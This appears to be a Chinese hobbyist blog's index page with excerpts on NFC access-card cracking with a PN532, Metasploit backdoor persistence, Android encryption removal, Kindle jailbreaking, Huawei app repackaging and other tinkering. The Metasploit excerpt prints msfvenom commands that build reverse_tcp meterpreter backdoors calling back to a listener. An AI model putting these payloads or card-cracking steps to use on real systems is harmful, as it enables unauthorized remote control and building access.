主页

安卓使用 PN532 读写 NFC

动机 安卓手机本身的NFC功能不全且爆破密码太慢,于是买了个PN532破小区门卡。 Windows上有现成的工具MifareOneTool和教程,很轻松就解决了,于是想着能否在安卓的Termux上复现,于是就有了这篇文章。 准备 物质准备 PN532,我买的是这个的PN532+CH340G套餐 一台有OTG功能的安卓手机,安卓版本最低为7.0 自行焊接PN532的引脚 焊接完成后按下表接线,注意PN532上面有两个调节工作模式的开关(开关上覆膜),这里不需要调节。 PN532 USB转TTL模块 USB转TTL线(具体颜色不重要) GND GND ...

开始使用 Bootstrap

动机 由于非常想要一个像样的警告框,于是随便搞了个前端框架,仅作记录 demo Well done! Great! Here comes a link. Whenever you need to, be sure to use margin utilities to keep things nice and tidy. An example notice alert with an icon An example notice question with an icon An example danger alert with an icon An example error alert with an ico...

使用 Python 内置模块接收 Gitea Webhook 以自动更新

动机 由于完全没找到个像样的Webhook轮子和自动更新轮子,所以自己乱写了一个。单线程,但是it just works™ Gitea 以下假设你的生产服务器地址为192.168.33.44。 配置文件 Webhook 配置文件文档,包括对loopback等特殊取值的说明 跑Gitea的服务端要改一下custom/conf/app.ini,最后加上以下这一段内容,然后重启Gitea (loopback指的是跑Gitea的服务器自己,一般不建议添加) [webhook] ALLOWED_HOST_LIST = 192.168.33.44,loopback Webhook 设置 Webhook 配置文档 设置->Web 钩子->添加 We...

为 Metasploit 的后门内置 persistence

新版 重构后的项目位于Young-Lord/msf-remote-logger,直接用这个就可以了。(开源协议:AGPL-3.0) 前言 依旧是一篇名不副实的博文。说到底是跑了个Python监听服务器,然后自动处理连接过来的session。 代码很烂,但又不是不能用。基于WTFPL协议共享。 正文 # pip install tendo pymetasploit3 # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.13.106 LPORT=7787 --platform Windows -f exe > b.exe # msfvenom -p windows/meterpreter/reve...

关闭 Android 文件系统强制加密

参考资料 如何为采用动态分区的高通设备禁用 data 分区强制加密 简单来说就是依次在/product, /vendor, /system分区下寻找etc/fstab.qcom文件,把,fileencryption=ice改成,encryptable=ice或者直接删掉,然后清除data分区。 修改后,还需要在Recovery内禁用AVB校验。 文中还提到了使用magiskboot hexpatch支持动态分区的设备的方法。

Kindle 越狱记录

背景 Kindle Voyage一直在吃灰,一年前刚好能越狱,就越了个狱并探索了一下。此处做一些记录。 越狱 这里就直接摆书伴的教程了,比较麻烦,全程可以使用手机OTG功能完成。 基础框架 JailBreak Hotfix,必须先装,防止越狱失效 MRPI, KUAL,插件管理器 在连接电脑后显示的根目录新建一个目录update.bin.tmp.partial,防止Kindle更新 插件 建议先把书伴的列表与NiLuJe的列表都看一遍,下面很多插件下载链接都在这里 大部分插件安装只需将文件夹放进extensions目录下即可,小部分以.bin结尾的,需要通过;log mrpi刷入,具体可以看书伴的教程 KOReader, KPVBooklet,极大增强的电子书阅读...

华为hap安装包逆向记录

背景 最近对华为智能手表(HarmonyOS 2)应用商店中的程序进行了提取、解包、修改以及修改包名后重新安装,而全程没有找到这方面的教程,故稍作记录。 本文全程未用到DevEco Studio,并且仅在Windows 10系统下尝试可行。理论上其它操作系统也可完成本文全部流程。 目标应用包名为com.company.victim,修改后的新包名为moe.person.attack 使用的工具(依赖) Java (JDK) Android SDK Platform-Tools Apktool smali/baksmali jadx-gui hapsigntoolv2.jar (GitHub) (Gitee) jarsigner(默认随JDK安装)...

使用谷歌相机与相册的记录

正文 谷歌基础框架 Xposed模块 - FakeGApps FakeGApps - 伪装Google应用已安装 Magisk模块 - MinMicroG 接着,在Magisk中刷入MinMicroG:首先在这里 下载MinMicroG-Minimal-2.11.1-20220202153430.zip, 刷入,重启后打开microG Settings确认安装情况。 谷歌相机 安卓应用 - GCam 在公众号“好青年耗子”提供的天翼云盘链接(访问码v2qy)中下载安装1117.自动调用副摄-优化照片算法、增加人脸识别MGC_8.1.101_A9_GV1l_snap.apk(或者使用官方链接) 谷歌相册 Xposed模块 - Pixelify GPhotos Pix...